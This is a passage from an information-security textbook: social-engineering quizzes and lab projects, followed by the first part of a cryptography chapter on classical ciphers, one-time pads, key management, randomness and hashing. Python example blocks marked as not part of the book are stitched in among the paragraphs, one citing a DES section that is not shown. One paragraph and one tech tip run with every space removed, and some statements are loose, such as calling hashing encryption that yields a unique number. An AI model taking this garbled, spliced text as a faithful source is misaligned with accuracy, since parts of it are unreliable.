3. The process of going through a target’s trash searching for information that can be used in an attack, or to gain knowledge about a system or network, is known as _______________.
4. _______________ is the simple tactic of following closely behind a person who has just used their access card or PIN to gain physical access to a room or building.
5. In _______________, the attacker hopes to convince the target to initiate contact.
6. _______________ is a variation of _______________ that uses voice communication technology to obtain the information the attacker is seeking.
Multiple-Choice Quiz
1. Which of the following is considered a good practice for password security?
A. Using a combination of upper- and lowercase characters, a number, and a special character in the password itself
B. Not writing the password down
C. Changing the password on a regular basis
D. All of the above
2. The password dilemma refers to the fact that:
A. Passwords that are easy for users to remember are also easy for attackers to guess.
B. The more difficult we make it for attackers to guess our passwords, and the more frequently we force password changes, the more difficult the passwords are for authorized users to remember and the more likely they are to write them down.
C. Users will invariably attempt to select passwords that are words they can remember. This means they may select things closely associated with them, such as their spouse’s or child’s name, a beloved sports team, or a favorite model of car.
D. Passwords assigned by administrators are usually better and more secure, but are often harder for users to remember.
3. The simple tactic of following closely behind a person who has just used their own access card or PIN to gain physical access to a room or building is called:
A. Shoulder surfing
B. Tagging-along
C. Piggybacking
D. Access drafting
4. The process of going through a target’s trash in hopes of finding valuable information that might be used in a penetration attempt is known as:
A. Dumpster diving
B. Trash trolling
C. Garbage gathering
D. Refuse rolling
5. Which of the following is a type of social engineering attack in which an attacker attempts to obtain sensitive information from a user by masquerading as a trusted entity in an e-mail?
A. SPAM
B. SPIM
C. Phishing
D. Vishing
6. Reverse social engineering involves:
A. Contacting the target, eliciting some sensitive information, and convincing them that nothing out of the ordinary has occurred
B. Contacting the target in an attempt to obtain information that can be used in a second attempt with a different individual
C. An individual lower in the chain of command convincing somebody at a higher level to divulge information that the attacker is not authorized to have
D. An attacker attempting to somehow convince the target to initiate contact in order to avoid questions about authenticity
7. The reason for not allowing users to install new hardware or software without the knowledge of security administrators is:
A. They may not complete the installation correctly and the administrator will have to do more work, taking them away from more important security tasks.
B. They may inadvertently install more than just the hardware or software; they may accidentally install a backdoor into the network.
C. They may not have paid for it and thus may be exposing the organization to civil penalties.
D. Unauthorized hardware and software are usually for leisure purposes and will distract employees from the job they were hired to perform.
8. Once an organization’s security policies have been established, the single most effective method of countering potential social engineering attacks is:
A. An active security awareness program
B. A separate physical access control mechanism for each department in the organization
C. Frequent testing of both the organization’s physical security procedures and employee telephone practices
D. Implementing access control cards and the wearing of security identification badges
9. Which of the following types of attacks utilizes instant messaging services?
A. SPAM
B. SPIM
C. Phishing
D. Vishing
10. In what way are PINs similar to passwords?
A. Users will normally pick a PIN that is easy to remember, such as a date or specific pattern.
B. Attackers know common PINs and will try to use them or will attempt to learn more about the user in order to make an educated guess as to what their PIN might be.
C. Users may write them down to remember them.
D. All of the above are true.
Essay Quiz
1. Explain the difference between social engineering and reverse social engineering.
2. Discuss how a security-related hoax might become a security issue.
3. How might shoulder surfing be a threat in your school or work environment? What can be done to make this sort of activity more difficult?
4. For an environment familiar to you (such as work or school), describe the different non-employees who may have access to facilities that could contain sensitive information.
5. Describe some of the user security responsibilities that you feel are most important for users to remember.
Lab Projects
• Lab Project 4.1
If possible at either your place of employment or your school, attempt to determine how easy it would be to perform dumpster diving to gain access to information at the site. Are trash receptacles easy to gain access to? Are documents shredded before being discarded? Are areas where trash is stored easily accessible?
• Lab Project 4.2
Perform a search on the Web for articles and stories about social engineering attacks or reverse social engineering attacks. Choose and read five or six articles. How many of the attacks were successful? How many failed and why? How could those that may have initially succeeded have been prevented?
• Lab Project 4.3
Similar to Lab Project 4.2, perform a search on the Web for articles and stories about phishing attacks. Choose and read five or six articles. How many of the attacks were successful? How many failed and why? How might the successful attacks have been mitigated or successfully accomplished?
Chapter 5 Cryptography
If you are designing cryptosystems, you’ve got to think about long-term applications. You’ve got to try to figure out how to build something that is secure against technology in the next century that you cannot even imagine.
—WHITFIELD DIFFIE
In this chapter, you will learn how to
Understand the fundamentals of cryptography
Identify and describe the three types of cryptography
List and describe current cryptographic algorithms
Explain how cryptography is applied for security
Cryptography is the science of encrypting, or hiding, information—something people have sought to do since they began using language. Although language allowed people to communicate with one another, those in power attempted to hide information by controlling who was taught to read and write. Eventually, more complicated methods of concealing information by shifting letters around to make the text unreadable were developed. These complicated methods are cryptographic algorithms, also known as ciphers. The word cipher comes from the Arabic word sifr, meaning empty or zero. When material, called plaintext, needs to be protected from unauthorized interception or alteration, it is encrypted into ciphertext. This is done using an algorithm and a key, and the rise of digital computers has provided a wide array of algorithms and increasingly complex keys. The choice of specific algorithm depends on several factors, and they will be examined in this chapter. Cryptanalysis, the process of analyzing available information in an attempt to return the encrypted message to its original form, required advances in computer technology for complex encryption methods. The birth of the computer made it possible to easily execute the calculations required by more complex encryption algorithms. Today, the computer almost exclusively powers how encryption is performed. Computer technology has also aided cryptanalysis, allowing new methods to be developed, such as linear and differential cryptanalysis. Differential cryptanalysis is done by comparing the input plaintext to the output ciphertext to try and determine the key used to encrypt the information. Linear cryptanalysis is similar in that it uses both plaintext and ciphertext, but it puts the plaintext through a simplified cipher to try and deduce what the key is likely to be in the full version of the cipher.
Cryptography in Practice
While cryptography may be a science, it performs critical functions in the enabling of trust across computer networks in business and other functions. Before we dig deep into the technical nature of cryptographic practices, an overview of current capabilities is useful. Examining cryptography from a high level, there are several relevant points today. Cryptography has been a long-running event of advances both on the side of cryptography and the side of breaking it via analysis. With the advent of digital cryptography, the advantage has clearly swung to the side of cryptography. Modern computers have also increased the need for, and lowered the cost of employing, cryptography to secure information. In the past, the effectiveness rested in the secrecy of the algorithm, but with modern digital cryptography, the strength is based on sheer complexity. The power of networks and modern algorithms has also been employed to manage automatic key management.
Cryptography is much more than encryption. Cryptographic methods enable data protection, data hiding, integrity checks, nonrepudiation services, policy enforcement, key management and exchange, and many more elements used in modern computing. If you used the Web today, odds are you used cryptography without even knowing it.
Cryptography has many uses besides just enabling confidentiality in communication channels. Cryptographic functions are used in a wide range of applications, including, but not limited to, hiding data, resisting forgery, resisting unauthorized change, resisting repudiation, policy enforcement, and key exchanges. In spite of the strengths of modern cryptography, it still fails due to other issues; known plaintext attacks, poorly protected keys, and repeated passphrases are examples of how strong cryptography is rendered weak via implementation mistakes. Modern cryptographic algorithms are far stronger than needed given the state of cryptanalysis. The weaknesses in cryptosystems come from the system surrounding the algorithm, implementation, and operationalization details. Adi Shamir, the S in RSA, states it clearly: “Attackers do not break crypto; they bypass it.” Over time, weaknesses and errors, as well as shortcuts, are found in algorithms. When an algorithm is reported as broken, the term “broken” can have many meanings. This could mean that the algorithm is of no further use, or it could mean that it has weaknesses that may someday be employed to break it, or anything between these extremes. As all methods can be broken with brute force, one question is how much effort is required, at what cost, when compared to the value of the asset under protection. When examining the strength of a cryptosystem, it is worth examining the following types of levels of protection:
1. The mechanism is no longer useful for any purpose.
2. The cost of recovering the cleartext without benefit of the key has fallen to a low level.
3. The cost has fallen to equal to or less than the value of the data or the next least cost attack.
4. The cost has fallen to within several orders of magnitude of the cost of encryption or the value of the data.
5. The elapsed time of attack has fallen to within magnitudes of the life of the data, regardless of the cost thereof.
6. The cost has fallen to less than the cost of a brute-force attack against the key.
7. Someone has recovered one key or one message.
This list of conditions is a descending list of risks/benefits. Conditions 6 and 7 are regular occurrences in cryptographic systems, and generally not worth worrying about at all. In fact, it is not until the fourth point that one has to have real concerns. With all this said, most organizations consider replacement between 5 and 6. If any of the first three are positive, the organization seriously needs to consider changing their cryptographic methods.
Fundamental Methods
Modern cryptographic operations are performed using both an algorithm and a key. The choice of algorithm depends on the type of cryptographic operation that is desired. The subsequent choice of key is then tied to the specific algorithm. Cryptographic operations include encryption (for the protection of confidentiality), hashing (for the protection of integrity), digital signatures (to manage nonrepudiation), and a bevy of specialty operations such as key exchanges. The methods used to encrypt information are based on two separate operations, substitution and transposition. Substitution is the replacement of an item with a different item. Transposition is the changing of the order of items. Pig Latin, a child’s cipher, employs both operations in simplistic form and is thus easy to decipher. These operations can be done on words, characters, and, in the digital world, bits. What makes a system secure is the complexity of the changes employed. To make a system reversible (so you can reliably decrypt it), there needs to be a basis for the pattern of changes. Historical ciphers used relatively simple patterns, and ones that required significant knowledge (at the time) to break. Modern cryptography is built around complex mathematical functions. These functions have specific properties that make them resistant to reversing or solving by means other than the application of the algorithm and key.
Assurance is a specific term in security that means that something is not only true but can be proven to be so to some specific level of certainty.
While the mathematical specifics of these operations can be very complex and are beyond the scope of this level of material, the knowledge to properly employ them is not. Cryptographic operations are characterized by the quantity and type of data, as well as the level and type of protection sought. Integrity protection operations are characterized by the level of assurance desired. Data can be characterized by its state: data in transit, data at rest, or data in use. It is also characterized in how it is used, either in block form or stream form.
ComparativeStrengthsandPerformanceofAlgorithmsThereareseveralfactorsthatplayaroleindeterminingthestrengthofacryptographicalgorithm.Firstandmostobviousisthesizeofthekeyandtheresultingkeyspace.Thekeyspaceisdefinedasasetofeverypossiblekeyvalue.Onemethodofattackistosimplytryallofthepossiblekeysinabrute-forceattack.Theotherfactorisreferredtoasworkfactor,whichisasubjectivemeasurementofthetimeandeffortneededtoperformoperations.Iftheworkfactorislow,thentherateatwhichkeyscanbetestedishigh,meaningthatlargerkeyspacesareneeded.Workfactoralsoplaysaroleinprotectingsystemssuchaspasswordhashes,wherehavingahigherworkfactorcanbepartofthesecuritymechanism.
TechTip
KeyspaceComparisonsBecausethekeyspaceisanumericvalue,itisveryimportanttoensurethatcomparisonsaredoneusingsimilarkeytypes.Comparingakeymadeof1bit(2possiblevalues)andakeymadeof1letter(26possiblevalues)wouldnotyieldaccurateresults.Fortunately,thewidespreaduseofcomputershasmadealmostallalgorithmsstatetheirkeyspacevaluesintermsofbits.
A larger keyspace allows the use of keys of greater complexity, and therefore more security, assuming the algorithm is well designed. It is easy to see how key complexity affects an algorithm when you look at some of the encryption algorithms that have been broken. The Data Encryption Standard (DES) uses a 56-bit key, allowing 72,000,000,000,000,000 possible values, but it has been broken by modern computers. The modern implementation of DES, Triple DES (3DES), uses three 56-bit keys, for a total key length of 168 bits (although for technical reasons the effective key length is 112 bits), or 340,000,000,000,000,000,000,000,000,000,000,000,000 possible values. When an algorithm lists a certain number of bits as a key, it is defining the keyspace. Some algorithms have key lengths of 8192 bits or more, resulting in very large keyspaces, even by digital computer standards.
Modern computers have also challenged work factor elements, as algorithms can be rendered very quickly by specialized hardware such as high-end graphic chips. To defeat this, many algorithms have repeated cycles to add to the work and reduce the ability to parallelize operations inside processor chips. This is done to increase the inefficiency of a calculation, but in a manner that still results in suitable performance when given the key and still complicates matters when done in a brute-force manner with all keys.
Historical Perspectives
Cryptography is as old as secrets. Humans have been designing secret communication systems for as long as they’ve needed to keep communication private. The Spartans of ancient Greece would write on a ribbon wrapped around a cylinder with a specific diameter (called a scytale). When the ribbon was unwrapped, it revealed a strange string of letters. The message could be read only when the ribbon was wrapped around the same diameter cylinder. This is an example of a transposition cipher, where the same letters are used but the order is changed. In all these cipher systems, the unencrypted input text is known as plaintext and the encrypted output is known as ciphertext.
Substitution Ciphers
The Romans typically used a different method known as a shift cipher. In this case, one letter of the alphabet is shifted a set number of places in the alphabet for another letter. A common modern-day example of this is the ROT13 cipher, in which every letter is rotated 13 positions in the alphabet: n is written instead of a, o instead of b, and so on. These types of ciphers are commonly encoded on an alphabet wheel, as shown in Figure 5.1.
• Figure 5.1 Any shift cipher can easily be encoded and decoded on a wheel of two pieces of paper with the alphabet set as a ring; by moving one circle the specified number in the shift, you can translate the characters.
These ciphers were simple to use and also simple to break. Because hiding information was still important, more advanced transposition and substitution ciphers were required. As systems and technology became more complex, ciphers were frequently automated by some mechanical or electromechanical device. A famous example of a relatively modern encryption machine is the German Enigma machine from World War II (see Figure 5.2). This machine used a complex series of substitutions to perform encryption, and interestingly enough it gave rise to extensive research in computers.
• Figure 5.2 One of the surviving German Enigma machines
Caesar’s cipher uses an algorithm and a key: the algorithm specifies that you offset the alphabet either to the right (forward) or to the left (backward), and the key specifies how many letters the offset should be. For example, if the algorithm specifies offsetting the alphabet to the right, and the key is 3, the cipher substitutes an alphabetic letter three to the right for the real letter, so d is used to represent a, f represents c, and so on. In this example, both the algorithm and key are simple, allowing for easy cryptanalysis of the cipher and easy recovery of the plaintext message.
The ease with which shift ciphers were broken led to the development of substitution ciphers, which were popular in Elizabethan England (roughly the second half of the 16th century) and more complex than shift ciphers. Substitution ciphers work on the principle of substituting a different letter for every letter: a becomes g, b becomes d, and so on. This system permits 26 possible values for every letter in the message, making the cipher many times more complex than a standard shift cipher. Simple analysis of the cipher could be performed to retrieve the key, however. By looking for common letters such as e and patterns found in words such as ing, you can determine which cipher letter corresponds to which plaintext letter. The examination of ciphertext for frequent letters is known as frequency analysis. Making educated guesses about words will eventually allow you to determine the system’s key value (see Figure 5.3).
• Figure 5.3 Making educated guesses is much like playing hangman—correct guesses can lead to more or all of the key being revealed.
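The shift cipher and the frequency analysis that breaks it, as an added Python example that is not part of the book; the English letter-frequency table is a standard reference table, and the sample sentence is constructed from the chapter's own opening lines.

```python
from collections import Counter
import string

ALPHABET = string.ascii_uppercase

# Relative frequency (percent) of each letter in typical English text.
ENGLISH_FREQ = {
    "A": 8.167, "B": 1.492, "C": 2.782, "D": 4.253, "E": 12.702, "F": 2.228,
    "G": 2.015, "H": 6.094, "I": 6.966, "J": 0.153, "K": 0.772, "L": 4.025,
    "M": 2.406, "N": 6.749, "O": 7.507, "P": 1.929, "Q": 0.095, "R": 5.987,
    "S": 6.327, "T": 9.056, "U": 2.758, "V": 0.978, "W": 2.360, "X": 0.150,
    "Y": 1.974, "Z": 0.074,
}


def shift_encrypt(text, key):
    """Shift (Caesar) cipher: move every letter `key` places to the right.
    Case is preserved and non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + key) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def shift_decrypt(text, key):
    # Decryption is the same algorithm with the offset applied to the left.
    return shift_encrypt(text, -key)


def rot13(text):
    # ROT13 is the shift cipher with key 13; because 13 + 13 = 26,
    # applying it a second time restores the original text.
    return shift_encrypt(text, 13)


def chi_squared_vs_english(text):
    """How far the letter distribution of `text` is from English.
    Lower means closer; used to rank candidate keys."""
    letters = [c for c in text.upper() if c.isalpha()]
    n = len(letters)
    if n == 0:
        return float("inf")
    counts = Counter(letters)
    score = 0.0
    for ch in ALPHABET:
        expected = n * ENGLISH_FREQ[ch] / 100
        score += (counts.get(ch, 0) - expected) ** 2 / expected
    return score


def recover_shift_key(ciphertext):
    """Frequency analysis: a shift cipher has a keyspace of only 26 keys, so
    try every one and keep the key whose decryption looks most like English."""
    return min(range(26),
               key=lambda k: chi_squared_vs_english(shift_decrypt(ciphertext, k)))


# Constructed sample text (the chapter's own opening sentences).
SAMPLE = ("Cryptography is as old as secrets. Humans have been designing secret "
          "communication systems for as long as they have needed to keep "
          "communication private.")
```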
To correct this problem, more complexity had to be added to the system. The Vigenère cipher works as a polyalphabetic substitution cipher that depends on a password. This is done by setting up a substitution table like this one:
Then the password is matched up to the text it is meant to encipher. If the password is not long enough, the password is repeated until one character of the password is matched up with each character of the plaintext. For example, if the plaintext is Sample Message and the password is password, the resulting match is
SAMPLEMESSAGE
PASSWORDPASSW
The cipher letter is determined by use of the grid, matching the plaintext character’s row with the password character’s column, resulting in a single ciphertext character where the two meet. Consider the first letters S and P: when plugged into the grid they output a ciphertext character of H. This process is repeated for every letter of the message. Once the rest of the letters are processed, the output is HAEHHSDHHSSYA. In this example, the key in the encryption system is the password. The example also illustrates that an algorithm can be simple and still provide strong security. If someone knows about the table, they can determine how the encryption was performed, but they still will not know the key to decrypting the message. The more complex the key, the greater the security of the system.
The Vigenère cipher system and systems like it make the algorithms rather simple but the key rather complex, with the best keys comprising very long and very random data. Key complexity is achieved by giving the key a large number of possible values.
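The Vigenère grid, the password matching and the Sample Message / password walk-through above, as an added Python example that is not part of the book; repeat_distances is an added helper for the pattern-spotting step that the Try This! exercise describes.

```python
import string

ALPHA = string.ascii_uppercase


def vigenere_table():
    """The 26x26 substitution grid: row i holds the alphabet rotated i places,
    so row A is unshifted and row B starts at B."""
    return [ALPHA[i:] + ALPHA[:i] for i in range(26)]


def letters_only(text):
    # The book's example drops the space and writes everything in capitals.
    return "".join(ch for ch in text.upper() if ch.isalpha())


def match_password(plaintext, password):
    """Repeat the password until one character lines up with each plaintext
    character; returns the two aligned rows shown in the text."""
    pt = letters_only(plaintext)
    key = letters_only(password)
    stream = (key * (len(pt) // len(key) + 1))[:len(pt)]
    return pt, stream


def vigenere_encrypt(plaintext, password):
    """Row = plaintext letter, column = password letter, cell = ciphertext letter."""
    table = vigenere_table()
    pt, stream = match_password(plaintext, password)
    return "".join(table[ALPHA.index(p)][ALPHA.index(k)] for p, k in zip(pt, stream))


def vigenere_decrypt(ciphertext, password):
    """Reverse lookup: in the password letter's column, find the row whose
    entry is the ciphertext letter; that row's label is the plaintext letter."""
    table = vigenere_table()
    ct, stream = match_password(ciphertext, password)
    out = []
    for c, k in zip(ct, stream):
        col = ALPHA.index(k)
        row = next(r for r in range(26) if table[r][col] == c)
        out.append(ALPHA[row])
    return "".join(out)


def repeat_distances(ciphertext, n=3):
    """Distances between repeated n-letter groups in the ciphertext. With a
    short password these are usually multiples of the password length, which
    is the pattern the Try This! exercise asks you to look for."""
    positions = {}
    for i in range(len(ciphertext) - n + 1):
        positions.setdefault(ciphertext[i:i + n], []).append(i)
    return sorted({b - a for pos in positions.values() for a, b in zip(pos, pos[1:])})
```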
Try This!
Vigenère Cipher
Make a simple message that’s about two sentences long, and then choose two passwords, one that’s short and one that’s long. Then, using the substitution table presented in this section, perform simple encryption on the message. Compare the two ciphertexts; since you have the plaintext and the ciphertext, you should be able to see a pattern of matching characters. Knowing the algorithm used, see if you can determine the key used to encrypt the message.
One-time Pads
One-time pads are an interesting form of encryption in that they theoretically are perfect and unbreakable. The key is the same size or larger than the material being encrypted. The plaintext is XOR’ed against the key, producing the ciphertext. What makes the one-time pad “perfect” is the size of the key. If you use a keyspace full of keys, you will decrypt every possible message of the same length as the original, with no way to discriminate which one is correct. This makes a one-time pad unable to be broken by even brute-force methods, provided that the key is not reused. The need for a key as long as the message that is never reused makes a one-time pad less than practical for any mass use.
One-time pads are examples of perfect ciphers from a mathematical point of view. But when put into practice, the implementation creates weaknesses that result in less than perfect security. This is an important reminder that perfect ciphers from a mathematical point of view do not create perfect security in practice because of the limitations associated with implementation.
Algorithms
Every current encryption scheme is based upon an algorithm, a step-by-step, recursive computational procedure for solving a problem in a finite number of steps. The cryptographic algorithm—what is commonly called the encryption algorithm or cipher—is made up of mathematical steps for encrypting and decrypting information. The following illustration shows a diagram of the encryption and decryption process and its parts. There are three types of encryption algorithms commonly used: hashing, symmetric, and asymmetric. Hashing is a very special type of encryption algorithm that takes an input and mathematically reduces it to a unique number known as a hash, which is not reversible. Symmetric algorithms are also known as shared secret algorithms, as the same key is used for encryption and decryption. Finally, asymmetric algorithms use a very different process employing two keys, a public key and a private key, making up what is known as a key pair.
The best algorithms are always public algorithms that have been published for peer review by other cryptographic and mathematical experts. Publication is important, as any flaws in the system can be revealed by others before actual use of the system. This process greatly encourages the use of proven technologies. Several proprietary algorithms have been reverse-engineered, exposing the confidential data the algorithms try to protect. Examples of this include the decryption of Nikon’s proprietary RAW format, white-balance encryption, and the cracking of the ExxonMobil Speedpass RFID encryption. The use of a proprietary system can actually be less secure than using a published system. Whereas proprietary systems are not made available to be tested by potential crackers, public systems are made public for precisely this purpose.
One of the most common cryptographic failures is the creation of your own encryption scheme. Rolling your own cryptography, whether by creating algorithms or by implementing existing algorithms yourself, is a recipe for failure. Always use approved algorithms, and always use approved crypto libraries to implement them.
A system that maintains its security after public testing can be reasonably trusted to be secure. A public algorithm can be more secure because good systems rely on the encryption key to provide security, not the algorithm itself. The actual steps for encrypting data can be published, because without the key, the protected information cannot be accessed (see Figure 5.4).
• Figure 5.4 While everyone knows how to use a knob to open a door, without the key to unlock the knob, that knowledge is useless.
A key is a special piece of data used in both the encryption and decryption processes. The algorithms stay the same in every implementation, but a different key is used for each, which ensures that even if someone knows the algorithm you use to protect your data, he cannot break your security.
Tech Tip
XOR
A popular function in cryptography is eXclusive OR (XOR), which is a bitwise function applied to data. When you apply a key to data using XOR, then a second application undoes the first operation. This makes for speedy encryption/decryption, but makes the system totally dependent upon the secrecy of the key. A hard-coded key in a program will be discovered, making this a weak security mechanism in most cases.
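The XOR property in this tip and the one-time pad described earlier, as one added Python example that is not part of the book: the same pad applied twice undoes the encryption, a pad exists for every candidate message of the same length (which is why brute force cannot single one out), and reusing a pad cancels it out. The messages are constructed sample values.

```python
import secrets


def xor_bytes(a, b):
    """Bitwise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def generate_pad(length):
    # The pad must be truly random and at least as long as the message;
    # secrets draws from the OS cryptographic generator, not a seeded PRNG.
    return secrets.token_bytes(length)


def otp_encrypt(plaintext, pad):
    """Ciphertext = plaintext XOR pad (using only as much pad as the message needs)."""
    if len(pad) < len(plaintext):
        raise ValueError("pad must be at least as long as the plaintext")
    return xor_bytes(plaintext, pad[:len(plaintext)])


def otp_decrypt(ciphertext, pad):
    # XOR is its own inverse: applying the same pad again undoes the encryption.
    return otp_encrypt(ciphertext, pad)


def pad_that_yields(ciphertext, candidate_plaintext):
    """The pad under which `ciphertext` would decrypt to `candidate_plaintext`.
    One such pad exists for every candidate of the same length, so trying every
    key produces every possible message and singles out none of them."""
    return xor_bytes(ciphertext, candidate_plaintext)


def reuse_leakage(ciphertext1, ciphertext2):
    """If one pad is reused for two messages, XOR of the two ciphertexts equals
    XOR of the two plaintexts: the pad cancels out and the perfect guarantee
    is gone. This is why the pad must never be reused."""
    return xor_bytes(ciphertext1, ciphertext2)
```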
Comparing the strength of two different algorithms can be mathematically very challenging; fortunately for the layperson, there is a rough guide. Most current algorithms are listed with their key size in bits. Unless a specific algorithm has been shown to be flawed, in general, the greater number of bits will yield a more secure system. This works well for a given algorithm, but is meaningless to compare different algorithms. The good news is that most modern cryptography is more than strong enough for all but technical uses, and for those uses experts can determine appropriate algorithms and key lengths to provide the necessary protections.
Tech Tip
Man-in-the-Middle Attack
A man-in-the-middle attack is designed to defeat proper key exchange by intercepting the remote party’s key and replacing it with the attacker’s key in both directions. If done properly, only the attacker knows that the encrypted traffic is not secure, and the encrypted traffic can be read by the attacker.
Key Management
Because the security of the algorithms relies on the key, key management is of critical concern. Key management includes anything having to do with the exchange, storage, safeguarding, and revocation of keys. It is most commonly associated with asymmetric encryption, since asymmetric encryption uses both public and private keys. To be used properly for authentication, a key must be current and verified. If you have an old or compromised key, you need a way to check to see that the key has been revoked.
Key management is also important for symmetric encryption, because symmetric encryption relies on both parties having the same key for the algorithm to work. Since these parties are usually physically separate, key management is critical to ensure keys are shared and exchanged easily. They must also be securely stored to provide appropriate confidentiality of the encrypted information. There are many different approaches to secure storage of keys, such as putting them on a USB flash drive or smart card. While keys can be stored in many different ways, new PC hardware often includes the Trusted Platform Module (TPM), which provides a hardware-based key storage location that is used by many applications. (More specific information about the management of keys is provided later in this chapter and in Chapter 6.)
Random Numbers
Many digital cryptographic algorithms have a need for a random number to act as a seed and provide true randomness. One of the strengths of computers is that they can do a task over and over again in the exact same manner—no noise or randomness. This is great for most tasks, but in generating a random sequence of values, it presents challenges. Software libraries have pseudo-random generators, functions that produce a series of numbers that statistically appear random. But these random number generators are deterministic in that, given the sequence, you can calculate future values. This makes them inappropriate for use in cryptographic situations.
The level or amount of randomness is referred to as entropy. Entropy is the measure of uncertainty associated with a series of values. Perfect entropy equates to complete randomness, such that given any string of bits, there is no computation to improve guessing the next bit in the sequence. A simple “measure” of entropy is in bits, where the bits are the power of 2 that represents the number of choices. So if there are 2048 options, then this would represent 11 bits of entropy. In this fashion, one can calculate the entropy of passwords and measure how “hard they are to guess.”
Tech Tip
Randomness Issues
The importance of proper random number generation in cryptosystems cannot be overstated. Recent reports by the Guardian and the New York Times assert that the U.S. National Security Agency (NSA) has put a backdoor into the Cryptographically Secure Pseudorandom Number Generator (CSPRNG) algorithms described in NIST SP 800-90A, particularly the Dual_EC_DRBG algorithm. Further allegations are that the NSA paid RSA $10 million to use the resulting standard in its product line.
To resolve the problem of appropriate randomness, there are systems to create cryptographic random numbers. The level of complexity of the system is dependent upon the level of pure randomness needed. For some functions, such as master keys, the only true solution is a hardware-based random number generator that can use physical properties to derive entropy. In other, less demanding cases, a cryptographic library call can provide the necessary entropy. While the theoretical strength of the cryptosystem depends on the algorithm, the strength of the implementation in practice can depend on issues such as the key. This is a very important issue, and mistakes made in implementation can invalidate even the strongest algorithms in practice.
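Entropy in bits, keyspace size, expected search time, and the difference between a seeded library PRNG and a cryptographic generator, as an added Python example that is not part of the book. The key rate of 240 billion keys per second is the figure the DES section of this chapter quotes; the seed value is an arbitrary constructed constant.

```python
import math
import random
import secrets


def entropy_bits(choices):
    """Entropy of a uniform choice among `choices` equally likely options:
    the power of 2 that gives the number of choices, i.e. log2(choices)."""
    if choices < 1:
        raise ValueError("need at least one choice")
    return math.log2(choices)


def keyspace_size(key_bits):
    """Number of possible keys for a key of `key_bits` bits."""
    return 2 ** key_bits


def password_entropy_bits(alphabet_size, length):
    """Entropy of a password whose characters are drawn uniformly from an
    alphabet of `alphabet_size` symbols."""
    return length * math.log2(alphabet_size)


def expected_search_seconds(key_bits, keys_per_second):
    """Expected time for an exhaustive key search: on average half the keyspace
    is tried before the right key turns up. A real search stops as soon as the
    key is hit, which can be well before that average."""
    return keyspace_size(key_bits) / 2 / keys_per_second


def prng_is_reproducible(seed=20160101, count=8):
    """A seeded library PRNG is deterministic: two generators started from the
    same seed emit the identical sequence, so knowing the state means knowing
    every future value. That is why it must not produce keys."""
    first = random.Random(seed)
    second = random.Random(seed)
    return all(first.getrandbits(32) == second.getrandbits(32) for _ in range(count))


def new_key(nbytes=32):
    # Key material comes from the OS cryptographic generator (secrets, backed
    # by os.urandom), never from the seeded PRNG above.
    return secrets.token_bytes(nbytes)
```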
Hashing Functions
Hashing functions are commonly used encryption methods. A hashing function or hash function is a special mathematical function that performs a one-way function, which means that once the algorithm is processed, there is no feasible way to use the ciphertext to retrieve the plaintext that was used to generate it. Also, ideally, there is no feasible way to generate two different plaintexts that compute to the same hash value. The hash value is the output of the hashing algorithm for a specific input. The illustration shows the one-way nature of these functions.
Common uses of hashing algorithms are to store computer passwords and to ensure message integrity. The idea is that hashing can produce a unique value that corresponds to the data entered, but the hash value is also reproducible by anyone else running the same algorithm against the same data. So you could hash a message to get a message authentication code (MAC), and the computational number of the message would show that no intermediary has modified the message. This process works because hashing algorithms are typically public, and anyone can hash data using the specified algorithm. It is computationally simple to generate the hash, so it is simple to check the validity or integrity of something by matching the given hash to one that is locally generated. Several programs can compute hash values for an input file, as shown in Figure 5.5. Hash-based Message Authentication Code (HMAC) is a special subset of hashing technology. It is a hash algorithm applied to a message to make a MAC, but it is done with a previously shared secret. So the HMAC can provide integrity simultaneously with authentication. HMAC-MD5 is used in the NT LAN Manager version 2 challenge/response protocol.
• Figure 5.5 There are several programs available that will accept an input and produce a hash value, letting you independently verify the integrity of downloaded content.
A hash algorithm can be compromised with what is called a collision attack, in which an attacker finds two different messages that hash to the same value. This type of attack is very difficult and requires generating a separate algorithm that attempts to find a text that will hash to the same value of a known hash. This must occur faster than simply editing characters until you hash to the same value, which is a brute-force type attack. The consequence of a hash function that suffers from collisions is a loss of integrity. If an attacker can make two different inputs purposefully hash to the same value, she might trick people into running malicious code and cause other problems. Popular hash algorithms are the Secure Hash Algorithm (SHA) series, the RIPEMD algorithms, and the Message Digest (MD) hash of varying versions (MD2, MD4, MD5). Because of weaknesses and collision attack vulnerabilities, many hash functions are now considered to be insecure, including MD2, MD4, MD5, and the SHA-1 series.
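Hash-based integrity checking and HMAC with a shared secret, as an added Python example that is not part of the book. It shows the one-way digest, the avalanche effect of a one-character change, the download verification of Figure 5.5, and why a bare hash gives integrity but an HMAC also gives authentication; the shared secret and messages are constructed sample values.

```python
import hashlib
import hmac


def digest_hex(algorithm, data):
    """Hash `data` with a named algorithm (e.g. 'md5', 'sha1', 'sha256')
    and return the digest as hex, the form hash tools print."""
    return hashlib.new(algorithm, data).hexdigest()


def differing_bits(hex_a, hex_b):
    """Number of bit positions that differ between two equal-length digests;
    for a good hash, a tiny change in input flips about half the output bits."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def verify_download(data, published_hex, algorithm="sha256"):
    """Integrity check: recompute the digest locally and compare it with the
    value the publisher posted. compare_digest runs in constant time."""
    return hmac.compare_digest(digest_hex(algorithm, data), published_hex)


def hmac_tag(shared_secret, message):
    """HMAC-SHA256: a MAC that needs the previously shared secret to compute,
    so it provides origin authentication together with integrity."""
    return hmac.new(shared_secret, message, hashlib.sha256).hexdigest()


def verify_hmac(shared_secret, message, tag):
    return hmac.compare_digest(hmac_tag(shared_secret, message), tag)


def tamper_check(shared_secret, message, modified):
    """Returns (plain_hash_passes, hmac_passes) when `message` is replaced in
    transit by `modified`. Anyone can recompute the public hash over the new
    text, so a bare hash still verifies; the HMAC computed over the original
    does not match the modified text, and a new one needs the secret."""
    hash_passes = verify_download(modified, digest_hex("sha256", modified))
    hmac_passes = verify_hmac(shared_secret, modified, hmac_tag(shared_secret, message))
    return hash_passes, hmac_passes
```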
Tech Tip
Hashing Algorithms
The hashing algorithms in common use are MD2, MD4, and MD5, and SHA-1, SHA-256, SHA-384, and SHA-512. Because of potential collisions, MD2, MD4, MD5, and SHA-1 have been deprecated by many groups. Although not considered secure, they are still found in use, a testament to slow adoption of better security.
